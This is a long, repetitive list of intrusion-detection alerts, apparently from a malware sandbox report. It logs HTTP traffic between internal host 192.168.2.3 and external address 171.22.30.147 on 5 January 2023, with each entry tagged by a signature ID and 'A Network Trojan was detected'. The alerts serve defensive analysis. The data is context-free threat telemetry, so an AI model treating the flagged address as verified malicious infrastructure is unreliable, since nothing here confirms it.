            Timestamp:192.168.2.3171.22.30.14749857802024318 01/05/23-08:52:58.054307
            SID:2024318
            Source Port:49857
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750036802825766 01/05/23-08:53:51.046851
            SID:2825766
            Source Port:50036
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749883802021641 01/05/23-08:53:05.037332
            SID:2021641
            Source Port:49883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749857802024313 01/05/23-08:52:58.054307
            SID:2024313
            Source Port:49857
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749843802025381 01/05/23-08:52:54.266621
            SID:2025381
            Source Port:49843
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749794802021641 01/05/23-08:52:39.439392
            SID:2021641
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749754802025381 01/05/23-08:52:26.655822
            SID:2025381
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749972802825766 01/05/23-08:53:32.566966
            SID:2825766
            Source Port:49972
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749883802825766 01/05/23-08:53:05.037332
            SID:2825766
            Source Port:49883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749794802825766 01/05/23-08:52:39.439392
            SID:2825766
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749752802024318 01/05/23-08:52:26.039085
            SID:2024318
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749752802024313 01/05/23-08:52:26.039085
            SID:2024313
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749728802021641 01/05/23-08:52:19.268418
            SID:2021641
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750010802021641 01/05/23-08:53:42.643021
            SID:2021641
            Source Port:50010
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750023802825766 01/05/23-08:53:47.546596
            SID:2825766
            Source Port:50023
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749867802024318 01/05/23-08:53:00.773467
            SID:2024318
            Source Port:49867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749806802024318 01/05/23-08:52:42.779655
            SID:2024318
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749951802025381 01/05/23-08:53:24.927407
            SID:2025381
            Source Port:49951
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749711802024313 01/05/23-08:52:12.061796
            SID:2024313
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749772802024318 01/05/23-08:52:31.644906
            SID:2024318
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498152025483 01/05/23-08:52:45.296277
            SID:2025483
            Source Port:80
            Destination Port:49815
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749711802024318 01/05/23-08:52:12.061796
            SID:2024318
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749806802024313 01/05/23-08:52:42.779655
            SID:2024313
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749864802021641 01/05/23-08:52:59.960618
            SID:2021641
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497982025483 01/05/23-08:52:40.632649
            SID:2025483
            Source Port:80
            Destination Port:49798
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749772802024313 01/05/23-08:52:31.644906
            SID:2024313
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749727802025381 01/05/23-08:52:18.985108
            SID:2025381
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749788802025381 01/05/23-08:52:37.784136
            SID:2025381
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749895802024318 01/05/23-08:53:08.372653
            SID:2024318
            Source Port:49895
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750055802025381 01/05/23-08:53:56.183544
            SID:2025381
            Source Port:50055
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750011802024313 01/05/23-08:53:42.925761
            SID:2024313
            Source Port:50011
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497572025483 01/05/23-08:52:27.578914
            SID:2025483
            Source Port:80
            Destination Port:49757
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749895802024313 01/05/23-08:53:08.372653
            SID:2024313
            Source Port:49895
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749987802021641 01/05/23-08:53:36.549688
            SID:2021641
            Source Port:49987
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749834802024318 01/05/23-08:52:50.512718
            SID:2024318
            Source Port:49834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749868802825766 01/05/23-08:53:01.029018
            SID:2825766
            Source Port:49868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749722802025381 01/05/23-08:52:17.506386
            SID:2025381
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749773802825766 01/05/23-08:52:31.909319
            SID:2825766
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749986802825766 01/05/23-08:53:36.285692
            SID:2825766
            Source Port:49986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750027802025381 01/05/23-08:53:48.599181
            SID:2025381
            Source Port:50027
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749892802021641 01/05/23-08:53:07.470439
            SID:2021641
            Source Port:49892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749923802025381 01/05/23-08:53:17.329996
            SID:2025381
            Source Port:49923
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750050802025381 01/05/23-08:53:54.799294
            SID:2025381
            Source Port:50050
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749867802024313 01/05/23-08:53:00.773467
            SID:2024313
            Source Port:49867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749817802025381 01/05/23-08:52:45.747633
            SID:2025381
            Source Port:49817
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749803802021641 01/05/23-08:52:41.905218
            SID:2021641
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499742025483 01/05/23-08:53:33.180561
            SID:2025483
            Source Port:80
            Destination Port:49974
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750074802021641 01/05/23-08:54:01.233569
            SID:2021641
            Source Port:50074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750024802825766 01/05/23-08:53:47.812882
            SID:2825766
            Source Port:50024
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749833802025381 01/05/23-08:52:50.090304
            SID:2025381
            Source Port:49833
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500352025483 01/05/23-08:53:50.821138
            SID:2025483
            Source Port:80
            Destination Port:50035
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749921802021641 01/05/23-08:53:16.794242
            SID:2021641
            Source Port:49921
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749982802021641 01/05/23-08:53:35.215314
            SID:2021641
            Source Port:49982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750028802024313 01/05/23-08:53:48.853917
            SID:2024313
            Source Port:50028
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749728802024318 01/05/23-08:52:19.268418
            SID:2024318
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499552025483 01/05/23-08:53:26.069151
            SID:2025483
            Source Port:80
            Destination Port:49955
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750056802024318 01/05/23-08:53:56.463023
            SID:2024318
            Source Port:50056
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500132025483 01/05/23-08:53:43.537023
            SID:2025483
            Source Port:80
            Destination Port:50013
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749912802024318 01/05/23-08:53:14.329479
            SID:2024318
            Source Port:49912
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749894802025381 01/05/23-08:53:08.006895
            SID:2025381
            Source Port:49894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750028802024318 01/05/23-08:53:48.853917
            SID:2024318
            Source Port:50028
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750025802021641 01/05/23-08:53:48.086655
            SID:2021641
            Source Port:50025
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749750802025381 01/05/23-08:52:25.450968
            SID:2025381
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750039802025381 01/05/23-08:53:51.865723
            SID:2025381
            Source Port:50039
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749777802024318 01/05/23-08:52:34.550245
            SID:2024318
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749777802024313 01/05/23-08:52:34.550245
            SID:2024313
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499332025483 01/05/23-08:53:20.124148
            SID:2025483
            Source Port:80
            Destination Port:49933
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750046802021641 01/05/23-08:53:53.748051
            SID:2021641
            Source Port:50046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749774802021641 01/05/23-08:52:32.369884
            SID:2021641
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749883802024313 01/05/23-08:53:05.037332
            SID:2024313
            Source Port:49883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497602025483 01/05/23-08:52:28.390880
            SID:2025483
            Source Port:80
            Destination Port:49760
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749834802024313 01/05/23-08:52:50.512718
            SID:2024313
            Source Port:49834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749830802825766 01/05/23-08:52:49.252221
            SID:2825766
            Source Port:49830
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749866802025381 01/05/23-08:53:00.520534
            SID:2025381
            Source Port:49866
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749883802024318 01/05/23-08:53:05.037332
            SID:2024318
            Source Port:49883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500762025483 01/05/23-08:54:01.869812
            SID:2025483
            Source Port:80
            Destination Port:50076
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497272025483 01/05/23-08:52:19.059286
            SID:2025483
            Source Port:80
            Destination Port:49727
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749912802024313 01/05/23-08:53:14.329479
            SID:2024313
            Source Port:49912
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750029802825766 01/05/23-08:53:49.112211
            SID:2825766
            Source Port:50029
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749724802825766 01/05/23-08:52:18.098497
            SID:2825766
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749728802024313 01/05/23-08:52:19.268418
            SID:2024313
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497052025483 01/05/23-08:52:09.452565
            SID:2025483
            Source Port:80
            Destination Port:49705
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750056802024313 01/05/23-08:53:56.463023
            SID:2024313
            Source Port:50056
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749802802825766 01/05/23-08:52:41.641382
            SID:2825766
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499962025483 01/05/23-08:53:39.013838
            SID:2025483
            Source Port:80
            Destination Port:49996
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750052802825766 01/05/23-08:53:55.369344
            SID:2825766
            Source Port:50052
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749723802024313 01/05/23-08:52:17.811814
            SID:2024313
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500542025483 01/05/23-08:53:55.973562
            SID:2025483
            Source Port:80
            Destination Port:50054
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750051802024318 01/05/23-08:53:55.100340
            SID:2024318
            Source Port:50051
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749807802825766 01/05/23-08:52:43.044779
            SID:2825766
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749746802021641 01/05/23-08:52:24.299560
            SID:2021641
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749959802021641 01/05/23-08:53:28.075379
            SID:2021641
            Source Port:49959
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750051802024313 01/05/23-08:53:55.100340
            SID:2024313
            Source Port:50051
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749723802024318 01/05/23-08:52:17.811814
            SID:2024318
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749815802021641 01/05/23-08:52:45.213789
            SID:2021641
            Source Port:49815
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749818802024318 01/05/23-08:52:46.013246
            SID:2024318
            Source Port:49818
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749855802024318 01/05/23-08:52:57.514506
            SID:2024318
            Source Port:49855
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497792025483 01/05/23-08:52:35.313919
            SID:2025483
            Source Port:80
            Destination Port:49779
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749824802021641 01/05/23-08:52:47.639113
            SID:2021641
            Source Port:49824
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749855802024313 01/05/23-08:52:57.514506
            SID:2024313
            Source Port:49855
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749818802024313 01/05/23-08:52:46.013246
            SID:2024313
            Source Port:49818
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749751802024313 01/05/23-08:52:25.762510
            SID:2024313
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749843802021641 01/05/23-08:52:54.266621
            SID:2021641
            Source Port:49843
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749972802025381 01/05/23-08:53:32.566966
            SID:2025381
            Source Port:49972
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749846802024318 01/05/23-08:52:55.097334
            SID:2024318
            Source Port:49846
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497762025483 01/05/23-08:52:33.700899
            SID:2025483
            Source Port:80
            Destination Port:49776
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749911802025381 01/05/23-08:53:14.014731
            SID:2025381
            Source Port:49911
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749999802021641 01/05/23-08:53:39.715844
            SID:2021641
            Source Port:49999
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749760802024313 01/05/23-08:52:28.304789
            SID:2024313
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749902802025381 01/05/23-08:53:11.610501
            SID:2025381
            Source Port:49902
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749760802024318 01/05/23-08:52:28.304789
            SID:2024318
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749761802825766 01/05/23-08:52:28.591148
            SID:2825766
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749751802024318 01/05/23-08:52:25.762510
            SID:2024318
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497352025483 01/05/23-08:52:21.355667
            SID:2025483
            Source Port:80
            Destination Port:49735
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749856802825766 01/05/23-08:52:57.793570
            SID:2825766
            Source Port:49856
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750067802025381 01/05/23-08:53:59.373237
            SID:2025381
            Source Port:50067
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749857802025381 01/05/23-08:52:58.054307
            SID:2025381
            Source Port:49857
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749828802825766 01/05/23-08:52:48.735651
            SID:2825766
            Source Port:49828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500732025483 01/05/23-08:54:01.037839
            SID:2025483
            Source Port:80
            Destination Port:50073
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750010802025381 01/05/23-08:53:42.643021
            SID:2025381
            Source Port:50010
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749720802021641 01/05/23-08:52:16.949813
            SID:2021641
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750065802024313 01/05/23-08:53:58.843527
            SID:2024313
            Source Port:50065
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750078802825766 01/05/23-08:54:02.320663
            SID:2825766
            Source Port:50078
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749733802825766 01/05/23-08:52:20.679095
            SID:2825766
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749946802825766 01/05/23-08:53:23.547730
            SID:2825766
            Source Port:49946
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750077802024318 01/05/23-08:54:02.067623
            SID:2024318
            Source Port:50077
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749933802021641 01/05/23-08:53:20.043516
            SID:2021641
            Source Port:49933
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750077802024313 01/05/23-08:54:02.067623
            SID:2024313
            Source Port:50077
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749882802025381 01/05/23-08:53:04.789158
            SID:2025381
            Source Port:49882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750065802024318 01/05/23-08:53:58.843527
            SID:2024318
            Source Port:50065
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750068802024318 01/05/23-08:53:59.646284
            SID:2024318
            Source Port:50068
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749928802025381 01/05/23-08:53:18.678448
            SID:2025381
            Source Port:49928
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749745802825766 01/05/23-08:52:24.023320
            SID:2825766
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749798802024313 01/05/23-08:52:40.547899
            SID:2024313
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749758802021641 01/05/23-08:52:27.765970
            SID:2021641
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750062802021641 01/05/23-08:53:58.073723
            SID:2021641
            Source Port:50062
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749789802024318 01/05/23-08:52:38.076275
            SID:2024318
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750012802825766 01/05/23-08:53:43.190304
            SID:2825766
            Source Port:50012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749798802024318 01/05/23-08:52:40.547899
            SID:2024318
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749789802024313 01/05/23-08:52:38.076275
            SID:2024313
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749970802021641 01/05/23-08:53:32.043326
            SID:2021641
            Source Port:49970
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750037802021641 01/05/23-08:53:51.314352
            SID:2021641
            Source Port:50037
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749900802024318 01/05/23-08:53:10.997847
            SID:2024318
            Source Port:49900
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750034802021641 01/05/23-08:53:50.478539
            SID:2021641
            Source Port:50034
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749854802025381 01/05/23-08:52:57.240558
            SID:2025381
            Source Port:49854
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499362025483 01/05/23-08:53:20.912682
            SID:2025483
            Source Port:80
            Destination Port:49936
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749786802021641 01/05/23-08:52:37.217550
            SID:2021641
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749973802024313 01/05/23-08:53:32.829653
            SID:2024313
            Source Port:49973
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749762802025381 01/05/23-08:52:28.868227
            SID:2025381
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499142025483 01/05/23-08:53:14.932365
            SID:2025483
            Source Port:80
            Destination Port:49914
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749973802024318 01/05/23-08:53:32.829653
            SID:2024318
            Source Port:49973
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749845802025381 01/05/23-08:52:54.838950
            SID:2025381
            Source Port:49845
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749961802021641 01/05/23-08:53:29.597138
            SID:2021641
            Source Port:49961
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749974802825766 01/05/23-08:53:33.106432
            SID:2825766
            Source Port:49974
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749799802825766 01/05/23-08:52:40.836883
            SID:2825766
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750076802025381 01/05/23-08:54:01.789357
            SID:2025381
            Source Port:50076
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749764802825766 01/05/23-08:52:29.472789
            SID:2825766
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749891802825766 01/05/23-08:53:07.205477
            SID:2825766
            Source Port:49891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
